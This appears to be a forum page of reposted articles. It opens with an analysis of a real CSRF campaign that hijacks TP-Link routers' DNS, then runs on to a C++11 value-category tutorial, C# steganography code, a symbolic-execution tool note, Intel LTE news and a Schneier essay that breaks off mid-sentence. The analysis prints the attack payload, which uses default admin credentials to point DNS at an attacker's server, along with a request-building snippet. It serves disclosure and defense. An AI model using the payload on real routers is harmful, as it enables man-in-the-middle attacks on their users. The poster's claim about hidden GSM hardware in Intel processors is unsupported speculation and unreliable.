document.writeln('<style type="text/css">@import url(http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>')

So the obfuscated javascript adds a style tag to the current html document. The css in this style tag uses @import to instruct the browser to load additional css data from 192.168.1.1, which is the default internal IP address of most NAT routers. So it is obviously a CSRF attack which tries to reconfigure the router. The following section shows an analysis of what the request does with some TP-Link routers.

Analysis of the CSRF payload

It is obvious that the payload tries to reconfigure the options for the DHCP server included in the router at 192.168.1.1. While the parameters also include the start/end of the DHCP IP address range, the main purpose of the exploit is to change the primary DNS server to 106.187.36.85. The secondary nameserver points to a publicly available recursive DNS server (in this case the public DNS server provided by Google) in order to make sure that the user doesn’t notice any connectivity problems in case the attacker-controlled nameserver is (temporarily) unavailable for any reason. Searching for the string “userRpm/LanDhcpServerRpm” quickly revealed that the exploit is targeting TP-Link routers.
The fact that some TP-Link routers are vulnerable to CSRF attacks has already been publicly reported [1] by Jacob Holcomb in April 2013 and TP-Link has fixed this problem for some devices since then. Experiments have shown that several TP-Link routers are actually vulnerable to this CSRF attack (see below for an incomplete list of affected devices). It is also worth noting that a web server should use POST instead of GET for all actions doing persistent changes to the router. This can protect against attacks in some scenarios where the attacker can only trigger loading a given URL e.g. by posting an image to a public discussion board or sending an HTML email (which could also be used to trigger attacks like this if the victim has enabled loading of remote images). However, even a POST request to the router can be issued in an automated way if the attacker can execute javascript code in the client browser. So in order to further protect against CSRF the server should either add a securely generated CSRF token or use strict referer checking (which is easier to implement on embedded devices). The affected TP-Link routers use HTTP Basic Authentication to control access to the web interface. When entering the credentials to access the web interface, the browser typically asks the user whether he wants to permanently store the password in the browser. However, even if the user doesn’t want to permanently store the password in the browser, it will still temporarily remember the password and use it for the current session. Since the session is only controlled by the browser behavior, the router can’t actively terminate the session e.g. after a certain timeout or when clicking a logout button. Due to this limitation of HTTP Basic Authentication the configuration web interface has no logout button at all and the only way to terminate the session is closing and reopening the browser. 
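Stepping back to the CSRF-token countermeasure mentioned above, such a scheme can be sketched in a few lines. This is a generic illustration only: the function names are made up, and real firmware would need to persist the secret and tie the token to its own session handling.

```python
import hashlib
import hmac
import secrets

# Per-device secret; in firmware this would be generated once and persisted.
SECRET_KEY = secrets.token_bytes(32)

def make_csrf_token(session_id: str) -> str:
    # Bind the token to the session so it cannot be replayed across users.
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def check_csrf_token(session_id: str, token: str) -> bool:
    expected = make_csrf_token(session_id)
    # Constant-time comparison avoids timing side channels.
    return hmac.compare_digest(expected, token)
```

The web interface would embed `make_csrf_token(...)` in every form and reject any state-changing request whose submitted token fails `check_csrf_token(...)` — which is exactly what a cross-site `@import` request cannot supply.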
The CSRF exploit also includes the default credentials (username=admin, password=admin) in the URL. However, even if a username/password combination is given in the URL, the browser will ignore the credentials from the URL and still try the saved credentials or no authentication first. Only if this results in an HTTP 401 (Unauthorized) status code does the browser resend the request with the credentials from the URL. Due to this browser behavior, the exploit works if the user is either logged in to the router or if the standard password hasn’t been changed.

Consequences of a malicious DNS server

When an attacker has changed the upstream DNS server of a router, he can then carry out arbitrary man-in-the-middle attacks against users of the compromised router. Here is a list of several possible actions which can be carried out by redirecting certain DNS hostnames to an attacker server:

* Redirect users to phishing sites when opening a legitimate website
* Redirect users to browser exploits
* Block software upgrades
* Attack software updaters which don’t use cryptographic signatures
* Replace advertisements on websites by redirecting adservers (that’s what the DNSChanger malware did [2])
* Replace executable files downloaded from the official download site of legitimate software vendors
* Hijack email accounts by stealing the password if the mail client doesn’t enforce usage of TLS/SSL with a valid certificate
* Intercept communication between Android/iOS apps and their back-end infrastructure

As of now I do not know what kind of attacks the cybercrooks carry out with the malicious DNS servers. I have done some automated checks, resolved a large number of popular domain names with one of the DNS servers used for the attack, and compared the results against a self-hosted recursive resolver. Due to the prevalence of round-robin load-balancing on DNS level and location-dependent redirection used e.g.
by CDNs (content delivery networks), this automated comparison did result in a huge number of false positives, and due to time constraints I could only manually verify those IP addresses which appear for a significant number of different hostnames. None of them turned out to be a malicious manipulation. However, it is very well possible that the infected routers are used for targeted attacks against a limited number of websites. If you find out what kind of attacks are carried out using the malicious DNS servers, please drop me an email or leave a comment in my blog.

Prevalence of the exploit

I discovered this exploitation campaign with an automated client honeypot system. Until now I spotted the exploit five times on totally unrelated websites. During that time the honeypot was generating some 280 GB of web traffic. There were some differences in the obfuscation used for the exploit, but the actual CSRF requests generated are basically the same. The five instances of the exploit tried to change the primary nameserver to three different IP addresses, and it is likely that there are more of them which I haven’t spotted so far.

Recommendations to mitigate the problem

If you are using an affected TP-Link router, you should perform the following steps to prevent it from being affected by this exploit:

* Check whether the DNS servers have already been changed in your router
* Upgrade your router to the latest firmware. The vulnerability has already been patched at least for some devices
* If you don’t get an upgrade for your model from TP-Link, you may also check whether it is supported by OpenWRT
* Change the default password to something more secure (if you haven’t already done so)
* Don’t save your router password in the browser
* Close all other browser windows/tabs before logging in to the router
* Restart your browser when you’re finished using the router web interface (since the browser stores the password for the current browser session)

Affected Devices

I have already checked whether some TP-Link routers I had access to are vulnerable to the attack. Some devices do contain the vulnerability but are by default not affected by the exploits I’ve seen so far because they are not using the IP address 192.168.1.1 in the default configuration.

* TP-Link WR1043ND V1 up to firmware version 3.3.12 build 120405 is vulnerable (version 3.3.13 build 130325 and later is not vulnerable)
* TP-Link TL-MR3020: firmware version 3.14.2 Build 120817 Rel.55520n and version 3.15.2 Build 130326 Rel.58517n are vulnerable (but not affected by current exploit in default configuration)
* TL-WDR3600: firmware version 3.13.26 Build 130129 Rel.59449n and version 3.13.31 Build 130320 Rel.55761n are vulnerable (but not affected by current exploit in default configuration)
* WR710N v1: 3.14.9 Build 130419 Rel.58371n is not vulnerable

It is likely that some other devices are vulnerable as well. If you want to know whether your router is affected by this vulnerability, you can find it out by performing the following steps:

1. Open a browser and log in to your router
2. Navigate to the DHCP settings and note the DNS servers (it may be 0.0.0.0, which means that it uses the DNS server from your router’s upstream internet connection)
3. Open a new browser tab and visit the following URL (you may have to adjust the IP addresses if your router isn’t using 192.168.1.1): http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.4.4&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6 If your router is vulnerable, this changes the DNS servers to 8.8.4.4 and 8.8.8.8 (the two IP addresses from Google Public DNS). Please note that the request also reverts the DHCP IP range and lease time to the default values.
4. Go back to the first tab and reload the DHCP settings in the router web interface
5. If you see the servers 8.8.4.4 and 8.8.8.8 for primary and secondary DNS, your router is vulnerable
6. Revert the DNS settings to the previous settings from step 2
7. If your router is vulnerable, you may also upgrade it to the latest firmware and check whether it is still vulnerable

Feel free to drop me an email or post a comment with your model number and firmware version so that I can add the device to the list above.

References

[1]: TP-LINK WR1043N Hacked, Rooted
[2]: https://en.wikipedia.org/wiki/DNSChanger

This entry was posted in Security by Jakob.

Sursa: Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers | Jakob Lell's Blog
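For completeness, the verification request from step 3 can also be constructed programmatically. The sketch below (hypothetical helper, illustration only) merely builds the request object, including the Basic Auth header that a browser would send after a 401 challenge; it never sends anything, and running such a request against hardware you don't own would be illegal.

```python
import base64
import urllib.request

def build_test_request(router_ip="192.168.1.1", user="admin", password="admin"):
    # Query string taken from the manual test in the article
    # (sets DNS to Google's 8.8.4.4 / 8.8.8.8 and the default DHCP range).
    url = (f"http://{router_ip}/userRpm/LanDhcpServerRpm.htm"
           "?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120"
           "&gateway=0.0.0.0&domain=&dnsserver=8.8.4.4&dnsserver2=8.8.8.8"
           "&Save=%B1%A3+%B4%E6")
    req = urllib.request.Request(url)
    # The routers use HTTP Basic Auth; attach the credentials up front
    # instead of waiting for the 401 round trip a browser would perform.
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    return req
```

Actually sending the request (e.g. via `urllib.request.urlopen`) is deliberately left out.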
14. C++11 Tutorial: Explaining the Ever-Elusive Lvalues and Rvalues

October 30, 2013 by Danny Kalev

Every C++ programmer is familiar with the terms lvalue and rvalue. It’s no surprise, since the C++ standard uses them “all over”, as do many textbooks. But what do they mean? Are they still relevant now that C++11 has five value categories? It’s about time to clear up the mystery and get rid of the myths.

Lvalues and rvalues were introduced in a seminal article by Strachey et al (1963) that presented CPL. A CPL expression appearing on the left-hand side of an assignment expression is evaluated as a memory address into which the right-hand side value is written. Later, left-hand expressions and right-hand expressions became lvalues and rvalues, respectively. One of CPL’s descendants, B, was the language on which Dennis Ritchie based C. Ritchie borrowed the term lvalue to refer to a memory region to which a C program can write the right-hand side value of an assignment expression. He left out rvalues, feeling that lvalue and “not lvalue” would suffice. Later, rvalue made it into K&R C and ISO C++. C++11 extended the notion of rvalues even further by letting you bind rvalue references to them.

Although nowadays lvalues and rvalues have slightly different meanings from their original CPL meanings, they are encoded “in the genes of C++,” to quote Bjarne Stroustrup. Therefore, understanding what they mean and how the addition of move semantics affected them can help you understand certain C++ features and idioms better – and write better code.

Right from Wrong

Before attempting to define lvalues, let’s look at some examples:

int x=9;
std::string s;
int *p=0;
int &ri=x;

The identifiers x, s, p and ri are all lvalues.
Indeed, they can appear on the left-hand side of an assignment expression and therefore seem to justify the CPL generalization: “Anything that can appear on the left-hand side of an assignment expression is an lvalue.” However, counter-examples are readily available:

void func(const int * pi, const int & ri)
{
    *pi=7; //compilation error, *pi is const
    ri=8;  //compilation error, ri is const
}

*pi and ri are const lvalues. Therefore, they cannot appear on the left-hand side of an expression after their initialization. This property doesn’t make them rvalues, though.

Now let’s look at some examples of rvalues. Literals such as 7, ‘a’, false and “hello world!” are instances of rvalues:

7==x;
char c= 'a';
bool clear=false;
const char s[]="hello world!";

Another subcategory of rvalues is temporaries. During the evaluation of an expression, an implementation may create a temporary object that stores an intermediary result:

int func(int y, int z, int w)
{
    int x=0;
    x=(y*z)+w;
    return x;
}

In this case, an implementation may create a temporary int to store the result of the sub-expression y*z. Conceptually, a temporary expires once its expression is fully evaluated. Put differently, it goes out of scope or gets destroyed upon reaching the nearest semicolon. You can create temporaries explicitly, too. An expression in the form C(arguments) creates a temporary object of type C:

cout<<std::string ("test").size()<<endl;

Contrary to the CPL generalization, rvalues may appear on the left-hand side of an assignment expression in certain cases:

string ()={"hello"}; //creates a temp string

You’re probably more familiar with the shorter form of this idiom:

string("hello"); //creates a temp string

Clearly, the CPL generalization doesn’t really cut it for C++, although intuitively, it does capture the semantic difference between lvalues and rvalues. So, what do lvalues and rvalues really stand for?
A Matter of Identity

An expression is a program statement that yields a value, for example a function call, a sizeof expression, an arithmetic expression, a logical expression, and so on. You can classify C++ expressions into two categories: values with identity and values with no identity. In this context, identity means a name, a pointer, or a reference that enables you to determine if two objects are the same, to change the state of an object, or to copy it:

struct {int x; int y;} s; //no type name, value has id
string &rs= *new string;
const char *p= rs.data();

s, rs and p are identities of values. We can draw the following generalization: lvalues in C++03 are values that have identity. By contrast, rvalues in C++03 are values that have no identity. C++03 rvalues are accessible only inside the expression in which they are created:

int& func();
int func2();
func();  //this call is an lvalue
func2(); //this call is an rvalue
sizeof(short); //rvalue
new double; //new expressions are rvalues
S::S() {this->x=0; /*this is an rvalue expression*/}

A function’s name (not to be confused with a function call) is an rvalue expression that evaluates to the function’s address. Similarly, an array’s name is an rvalue expression that evaluates to the address of the first element of the array:

int& func3();
int& (*pf)()=func3; //func3 is an rvalue
int arr[2];
int* pi=arr; //arr is an rvalue

Because rvalues are short-lived, you have to capture them in lvalues if you wish to access them outside the context of their expression:

std::size_t n=sizeof(short);
double *pd=new double;
struct S {
    int x, y;
    S() { S *p=this; p->x=0; p->y=0;}
};

Remember that any expression that evaluates to an lvalue reference (e.g., a function call, an overloaded assignment operator, etc.) is an lvalue. Any expression that returns an object by value is an rvalue. Prior to C++11, identity (or the lack thereof) was the main criterion for distinguishing between lvalues and rvalues.
However, the addition of rvalue references and move semantics to C++11 added a twist to the plot.

Binding Rvalues

C++11 lets you bind rvalue references to rvalues, effectively prolonging their lifetime as if they were lvalues:

//C++11
int && func2(){
    return 17; //returns an rvalue
}

int main()
{
    int x=0;
    int&& rr=func2();
    cout<<rr<<endl; //output: 17
    x=rr; // x=17 after the assignment
}

Using lvalue references where rvalue references are required is an error:

int& func2(){ //compilation error: cannot bind
    return 17; //an lvalue reference to an rvalue
}

In C++03 copying the rvalue to an lvalue is the preferred choice (in some cases you can bind an lvalue reference to const to achieve a similar effect):

int func2(){ // an rvalue expression
    return 17;
}
int m=func2(); // C++03-style copying

For fundamental types, the copy approach is reasonable. However, as far as class objects are concerned, spurious copying might incur performance overhead. Instead, C++11 encourages you to move objects. Moving means pilfering the resources of the source object, instead of copying it. For further information about move semantics, read C++11 Tutorial: Introducing the Move Constructor and the Move Assignment Operator.

//C++11 move semantics in action
string source ("abc"), target;
target=std::move(source); //pilfer source
//source no longer owns the resource
cout<<"source: "<<source<<endl; //source:
cout<<"target: "<<target<<endl; //target: abc

How does move semantics affect the semantics of lvalues and rvalues?

The Semantics of Change

In C++03, all you needed to know was whether a value had identity. In C++11 you also have to examine another property: movability. The combination of identity and movability (i and m, respectively, with a minus sign indicating negation) produces five meaningful value categories in C++11 – “a whole type-zoo,” as one of my Twitter followers put it:

i-m: lvalues are non-movable objects with identity. These are classic C++03 lvalues from the pre-move era.
The expression *p, where p is a pointer to an object, is an lvalue. Similarly, dereferencing a pointer to a function is an lvalue.

im: xvalues (“eXpiring” values) refer to objects near the end of their lifetime (before their resources are moved, for example). An xvalue is the result of certain kinds of expressions involving rvalue references, e.g., std::move(mystr);

i: glvalues, or generalized lvalues, are values with identity. These include lvalues and xvalues.

m: rvalues include xvalues, temporaries, and values that have no identity.

-im: prvalues, or pure rvalues, are rvalues that are not xvalues. Prvalues include literals and function calls whose return type is not a reference.

A detailed discussion about the new value categories is available in section 3.10 of the C++11 standard. It has often been said that the original semantics of C++03 lvalues and rvalues remains unchanged in C++11. However, the C++11 taxonomy isn’t quite the same as that of C++03; in C++11, every expression belongs to exactly one of the value classifications lvalue, xvalue, or prvalue.

In Conclusion

Fifty years after their inception, lvalues and rvalues are still relevant not only in C++ but in many contemporary programming languages. C++11 changed the semantics of rvalues, introducing xvalues and prvalues. Conceptually, you can tame this type-zoo by grouping the five value categories into supersets, where glvalues include lvalues and xvalues, and rvalues include xvalues and prvalues. Still confused? It’s not you. It’s BCPL’s heritage that exhibits unusual vitality in a world that’s light years away from the punched card and 16 kilobyte RAM era.

About the author: Danny Kalev is a certified system analyst and software engineer specializing in C++. Kalev has written several C++ textbooks and contributes C++ content regularly on various software developers’ sites. He was a member of the C++ standards committee and has a master’s degree in general linguistics.
He’s now pursuing a PhD in linguistics. Follow him on Twitter. Sursa: C++11 Tutorial: Explaining the Ever-Elusive Lvalues and Rvalues
  15. [h=1]Steganography: Simple Implementation in C#[/h]By Hamzeh soboh, 31 Oct 2013 Download source - 154.3 KB [h=2]Introduction[/h] Steganography is the art and science of hiding information by embedding messages within others. Steganography works by replacing bits of useless or unused data in regular computer files with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images [*]. I've implemented two methods that can be helpful to embed/extract a text in/from an image. The first one is embedText that receives the text you want to embed and the Bitmap object of the original image (your image before embedding the text in it), and returns the Bitmap object of the image after embedding the text in it. Then you can export the Bitmap object into an image file. It is optional to encrypt your text before starting the process for extra security. You are free then to send the result image by email or keep it on your flash memory for example. The second method is extractText that receives the Bitmap object of the processed image (the image that has already been used to embed the text in), and returns the text that has been extracted. [h=2]Executing the Code[/h]If you download the attached testing project, it allows you to open an image, write your text or import a text file, optionally encrypt your text before starting processing, embed the text in the image, and finally save the result image into an image file. Then you can reopen that application and the image that you've saved, and extract the text from it. [h=2]Using the Code[/h] The SteganographyHelper class contains the needed methods to embed/extract a text in/from an image. CAUTION: Don't save the result image in a lossy format (like JPEG); your data will be lost. Saving it as PNG is pretty good. 
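The LSB technique the class below implements can be distilled to a few lines once the Bitmap plumbing is stripped away. Here is a minimal Python sketch (illustration only, not the article's C# code) that hides one byte in the least significant bits of eight color-channel values, bit by bit, LSB first — the same ordering the C# code uses:

```python
def embed_byte(channels, value):
    # Write each bit of `value` (LSB first) into the low bit of a channel.
    out = list(channels)
    for i in range(8):
        out[i] = (out[i] & ~1) | ((value >> i) & 1)
    return out

def extract_byte(channels):
    # Reassemble the byte from the low bits, LSB first.
    value = 0
    for i in range(8):
        value |= (channels[i] & 1) << i
    return value

# Eight color-channel values from (roughly) three consecutive pixels:
pixels = [200, 101, 54, 97, 130, 255, 16, 73]
hidden = embed_byte(pixels, ord("A"))
# extract_byte(hidden) == 65 == ord("A")
```

Each channel changes by at most 1, which is imperceptible to the eye — and which is also why a lossy format like JPEG, which freely perturbs channel values, destroys the hidden data.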
class SteganographyHelper
{
    enum State
    {
        hiding,
        filling_with_zeros
    };

    public static Bitmap embedText(string text, Bitmap bmp)
    {
        State s = State.hiding;
        int charIndex = 0;
        int charValue = 0;
        long colorUnitIndex = 0;
        int zeros = 0;
        int R = 0, G = 0, B = 0;

        for (int i = 0; i < bmp.Height; i++)
        {
            for (int j = 0; j < bmp.Width; j++)
            {
                Color pixel = bmp.GetPixel(j, i);

                // clear the least significant bit of each color component
                pixel = Color.FromArgb(pixel.R - pixel.R % 2,
                                       pixel.G - pixel.G % 2,
                                       pixel.B - pixel.B % 2);

                R = pixel.R;
                G = pixel.G;
                B = pixel.B;

                for (int n = 0; n < 3; n++)
                {
                    if (colorUnitIndex % 8 == 0)
                    {
                        if (zeros == 8)
                        {
                            // the eight terminating zero bits have been written
                            if ((colorUnitIndex - 1) % 3 < 2)
                            {
                                bmp.SetPixel(j, i, Color.FromArgb(R, G, B));
                            }
                            return bmp;
                        }

                        if (charIndex >= text.Length)
                        {
                            s = State.filling_with_zeros;
                        }
                        else
                        {
                            charValue = text[charIndex++];
                        }
                    }

                    switch (colorUnitIndex % 3)
                    {
                        case 0:
                        {
                            if (s == State.hiding)
                            {
                                R += charValue % 2;
                                charValue /= 2;
                            }
                        }
                        break;
                        case 1:
                        {
                            if (s == State.hiding)
                            {
                                G += charValue % 2;
                                charValue /= 2;
                            }
                        }
                        break;
                        case 2:
                        {
                            if (s == State.hiding)
                            {
                                B += charValue % 2;
                                charValue /= 2;
                            }

                            bmp.SetPixel(j, i, Color.FromArgb(R, G, B));
                        }
                        break;
                    }

                    colorUnitIndex++;

                    if (s == State.filling_with_zeros)
                    {
                        zeros++;
                    }
                }
            }
        }

        return bmp;
    }

    public static string extractText(Bitmap bmp)
    {
        int colorUnitIndex = 0;
        int charValue = 0;
        string extractedText = String.Empty;

        for (int i = 0; i < bmp.Height; i++)
        {
            for (int j = 0; j < bmp.Width; j++)
            {
                Color pixel = bmp.GetPixel(j, i);

                for (int n = 0; n < 3; n++)
                {
                    switch (colorUnitIndex % 3)
                    {
                        case 0:
                        {
                            charValue = charValue * 2 + pixel.R % 2;
                        }
                        break;
                        case 1:
                        {
                            charValue = charValue * 2 + pixel.G % 2;
                        }
                        break;
                        case 2:
                        {
                            charValue = charValue * 2 + pixel.B % 2;
                        }
                        break;
                    }

                    colorUnitIndex++;

                    if (colorUnitIndex % 8 == 0)
                    {
                        // bits were embedded least-significant first,
                        // so reverse them to recover the character
                        charValue = reverseBits(charValue);

                        if (charValue == 0)
                        {
                            return extractedText;
                        }

                        char c = (char)charValue;
                        extractedText += c.ToString();
                    }
                }
            }
        }

        return extractedText;
    }

    public static int reverseBits(int n)
    {
        int result = 0;

        for (int i = 0; i < 8; i++)
        {
            result = result * 2 + n % 2;
            n /= 2;
        }

        return result;
    }
}

You can use the following code snippet to save the result image:

private void saveImageAs()
{
    SaveFileDialog save_dialog = new SaveFileDialog();
    save_dialog.Filter = "PNG|*.png|Bitmap|*.bmp";

    if (save_dialog.ShowDialog() == DialogResult.OK)
    {
        // SaveFileDialog.FilterIndex is 1-based
        switch (save_dialog.FilterIndex)
        {
            case 1:
            {
                bmp.Save(save_dialog.FileName, ImageFormat.Png);
            }
            break;
            case 2:
            {
                bmp.Save(save_dialog.FileName, ImageFormat.Bmp);
            }
            break;
        }
    }
}

[h=2]License[/h]

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

Sursa: Steganography: Simple Implementation in C# - CodeProject
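Stripped of the System.Drawing details, the article's LSB scheme fits in a few lines of C++ over a flat array of color units (one byte per channel). This is an illustrative round trip under our own names, not the article's code; bits go in least-significant-first, and eight consecutive zero bits terminate the message:

```cpp
// Toy LSB steganography over a flat buffer of color units (1 byte = 1 channel).
// embed() needs at least 8 * (text.size() + 1) units of capacity.
#include <cstdint>
#include <string>
#include <vector>

void embed(const std::string& text, std::vector<uint8_t>& units) {
    std::size_t u = 0;
    for (unsigned char c : text) {
        int v = c;
        for (int bit = 0; bit < 8; ++bit, ++u) {
            units[u] = (units[u] & 0xFE) | (v % 2);  // store next bit in the LSB
            v /= 2;
        }
    }
    for (int bit = 0; bit < 8; ++bit, ++u)  // terminator: eight zero bits
        units[u] &= 0xFE;
}

std::string extract(const std::vector<uint8_t>& units) {
    std::string out;
    for (std::size_t u = 0; u + 8 <= units.size(); u += 8) {
        int v = 0;
        for (int bit = 0; bit < 8; ++bit)
            v |= (units[u + bit] & 1) << bit;  // reassemble LSB-first
        if (v == 0)
            break;  // terminator reached
        out += static_cast<char>(v);
    }
    return out;
}
```

Unlike the C# version, the bits are reassembled least-significant-first directly, so no reverseBits pass is needed on extraction.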
  16. Manzano - A tool for the Symbolic Execution of Linux binaries

About Symbolic Execution

- Dynamically explore all program branches.
- Inputs are considered symbolic variables.
- Symbols remain uninstantiated and become constrained at execution time.
- At a conditional branch operating on symbolic terms, the execution is forked.
- Each feasible branch is taken, and the appropriate constraints logged.

Download: http://ekoparty.org/archive/2013/charlas/Manzano.pdf
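The fork-at-each-branch idea in the slides can be illustrated with a toy explorer: no real constraint solver, just an enumeration that forks at each condition on the symbolic input and logs the constraint taken (the two conditions are made up for the example):

```cpp
// Toy symbolic exploration: at each conditional on the symbolic input x,
// fork execution and log the constraint for the side taken.
#include <string>
#include <vector>

static const char* kConds[] = { "x < 10", "x % 2 == 0" };
static const int kNumConds = 2;

void explore(int depth, const std::string& path,
             std::vector<std::string>& paths) {
    if (depth == kNumConds) {   // every branch decided: one complete path
        paths.push_back(path);
        return;
    }
    // fork: first the branch where the condition holds, then where it doesn't
    explore(depth + 1, path + "(" + kConds[depth] + ") ", paths);
    explore(depth + 1, path + "!(" + kConds[depth] + ") ", paths);
}
```

Running explore(0, "", paths) yields the four path constraints for two independent branches; a real engine such as Manzano would additionally ask a solver which of those constraint sets are feasible.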
  17. [h=2]Intel unveils new LTE module[/h]

Written by Fudzilla staff

Getting there, slowly

Intel has added another module to its growing portfolio of 4G LTE solutions. The XMM 7160 is said to be one of the smallest LTE solutions out there and it's already shipping in Samsung's Intel-based Galaxy Tab 3. However, it is still a discrete module, and Intel will not have an integrated LTE solution until 2014, if then. Intel expects the first LTE-enabled phones based on its SoCs to show up next year, but they will not have integrated LTE. Unlike its previous solutions, the XMM 7160 supports HSPA and GSM in addition to 15 LTE bands. It also supports VoLTE services. Intel plans to introduce an even more advanced LTE module next year, with support for new advanced LTE features used by some networks. Intel is also offering the M.2 LTE module, which has practically the same hardware packed in a standard mini PCIe package. Until Intel launches its first truly integrated LTE solution, Qualcomm will continue to dominate the LTE space, virtually unopposed. Intel is not alone though. Nvidia, Mediatek and Broadcom are all behind Qualcomm and they are struggling to catch up. However, Samsung and Apple are still absent from the list and they rely on discrete solutions, not to mention countless smaller players, so there's still a market for modules like the XMM 7160.

Sursa: Intel unveils new LTE module

Why did I post this? It's not known for certain how Intel's Anti-Theft works. Since it can operate over GSM, that would mean the processor has a "hidden" GSM module, wouldn't it? This news makes me even more paranoid and makes me believe this theory even more.
  18. The Battle for Power on the Internet

We're in the middle of an epic battle for power in cyberspace. On one side are the traditional, organized, institutional powers such as governments and large multinational corporations. On the other are the distributed and nimble: grassroots movements, dissident groups, hackers, and criminals. Initially, the Internet empowered the second side. It gave them a place to coordinate and communicate efficiently, and made them seem unbeatable. But now, the more traditional institutional powers are winning, and winning big. How these two sides fare in the long term, and the fate of the rest of us who don't fall into either group, is an open question -- and one vitally important to the future of the Internet. In the Internet's early days, there was a lot of talk about its "natural laws" -- how it would upend traditional power blocs, empower the masses, and spread freedom throughout the world. The international nature of the Internet circumvented national laws. Anonymity was easy. Censorship was impossible. Police were clueless about cybercrime. And bigger changes seemed inevitable. Digital cash would undermine national sovereignty. Citizen journalism would topple traditional media, corporate PR, and political parties. Easy digital copying would destroy the traditional movie and music industries. Web marketing would allow even the smallest companies to compete against corporate giants. It really would be a new world order. This was a utopian vision, but some of it did come to pass. Internet marketing has transformed commerce. The entertainment industries have been transformed by things like MySpace and YouTube, and are now more open to outsiders. Mass media has changed dramatically, and some of the most influential people in the media have come from the blogging world. There are new ways to organize politically and run elections. 
Crowdfunding has made tens of thousands of projects possible to finance, and crowdsourcing made more types of projects possible. Facebook and Twitter really did help topple governments. But that is just one side of the Internet's disruptive character. The Internet has emboldened traditional power as well. On the corporate side, power is consolidating, a result of two current trends in computing. First, the rise of cloud computing means that we no longer have control of our data. Our e-mail, photos, calendars, address books, messages, and documents are on servers belonging to Google, Apple, Microsoft, Facebook, and so on. And second, we are increasingly accessing our data using devices that we have much less control over: iPhones, iPads, Android phones, Kindles, ChromeBooks, and so on. Unlike traditional operating systems, those devices are controlled much more tightly by the vendors, who limit what software can run, what they can do, how they're updated, and so on. Even Windows 8 and Apple's Mountain Lion operating system are heading in the direction of more vendor control. I have previously characterized this model of computing as "feudal." Users pledge their allegiance to more powerful companies who, in turn, promise to protect them from both sysadmin duties and security threats. It's a metaphor that's rich in history and in fiction, and a model that's increasingly permeating computing today. Medieval feudalism was a hierarchical political system, with obligations in both directions. Lords offered protection, and vassals offered service. The lord-peasant relationship was similar, with a much greater power differential. It was a response to a dangerous world. Feudal security consolidates power in the hands of the few. Internet companies, like lords before them, act in their own self-interest. They use their relationship with us to increase their profits, sometimes at our expense. They act arbitrarily. They make mistakes. 
They're deliberately -- and incidentally -- changing social norms. Medieval feudalism gave the lords vast powers over the landless peasants; we're seeing the same thing on the Internet. It's not all bad, of course. We, especially those of us who are not technical, like the convenience, redundancy, portability, automation, and shareability of vendor-managed devices. We like cloud backup. We like automatic updates. We like not having to deal with security ourselves. We like that Facebook just works -- from any device, anywhere. Government power is also increasing on the Internet. There is more government surveillance than ever before. There is more government censorship than ever before. There is more government propaganda, and an increasing number of governments are controlling what their users can and cannot do on the Internet. Totalitarian governments are embracing a growing "cyber sovereignty" movement to further consolidate their power. And the cyberwar arms race is on, pumping an enormous amount of money into cyber-weapons and consolidated cyber-defenses, further increasing government power. In many cases, the interests of corporate and government powers are aligning. Both corporations and governments benefit from ubiquitous surveillance, and the NSA is using Google, Facebook, Verizon, and others to get access to data it couldn't otherwise. The entertainment industry is looking to governments to enforce its antiquated business models. Commercial security equipment from companies like BlueCoat and Sophos is being used by oppressive governments to surveil and censor their citizens. The same facial recognition technology that Disney uses in its theme parks can also identify protesters in China and Occupy Wall Street activists in New York. Think of it as a public/private surveillance partnership. What happened? How, in those early Internet years, did we get the future so wrong? 
The truth is that technology magnifies power in general, but rates of adoption are different. The unorganized, the distributed, the marginal, the dissidents, the powerless, the criminal: They can make use of new technologies very quickly. And when those groups discovered the Internet, suddenly they had power. But later, when the already-powerful big institutions finally figured out how to harness the Internet, they had more power to magnify. That's the difference: The distributed were more nimble and were faster to make use of their new power, while the institutional were slower but were able to use their power more effectively. So while the Syrian dissidents used Facebook to organize, the Syrian government used Facebook to identify dissidents to arrest. All isn't lost for distributed power, though. For institutional power, the Internet is a change in degree, but for distributed power it's a qualitative one. The Internet gives decentralized groups -- for the first time -- the ability to coordinate. This can have incredible ramifications, as we saw in the SOPA/PIPA debate, Gezi, Brazil, and the rising use of crowdfunding. It can invert power dynamics, even in the presence of surveillance, censorship, and use control. But aside from political coordination, the Internet allows for social coordination as well: to unite, for example, ethnic diasporas, gender minorities, sufferers of rare diseases, and people with obscure interests. This isn't static: Technological advances continue to provide advantage to the nimble. I discussed this trend in my book Liars and Outliers. If you think of security as an arms race between attackers and defenders, any technological advance gives one side or the other a temporary advantage. But most of the time, a new technology benefits the nimble first. They are not hindered by bureaucracy -- and sometimes not by laws or ethics either. They can evolve faster. We saw it with the Internet. 
As soon as the Internet started being used for commerce, a new breed of cybercriminal emerged, immediately able to take advantage of the new technology. It took police a decade to catch up. And we saw it on social media, as political dissidents made use of its organizational powers before totalitarian regimes did. This delay is what I call a "security gap." It's greater when there's more technology, and in times of rapid technological change. Basically, if there are more innovations to exploit, there will be more damage resulting from society's inability to keep up with exploiters of all of them. And since our world is one in which there's more technology than ever before, and a faster rate of technological change than ever before, we should expect to see a greater security gap than ever before. In other words, there will be an increasing time period during which nimble distributed powers can make use of new technologies before slow institutional powers can make better use of those technologies. This is the battle: quick vs. strong. To return to medieval metaphors, you can think of a nimble distributed power -- whether marginal, dissident, or criminal -- as Robin Hood; and ponderous institutional powers -- both government and corporate -- as the feudal lords. So who wins? Which type of power dominates in the coming decades? Right now, it looks like traditional power. Ubiquitous surveillance means that it's easier for the government to identify dissidents than it is for the dissidents to remain anonymous. Data monitoring means it's easier for the Great Firewall of China to block data than it is for people to circumvent it. The way we all use the Internet makes it much easier for the NSA to spy on everyone than it is for anyone to maintain privacy. And even though it is easy 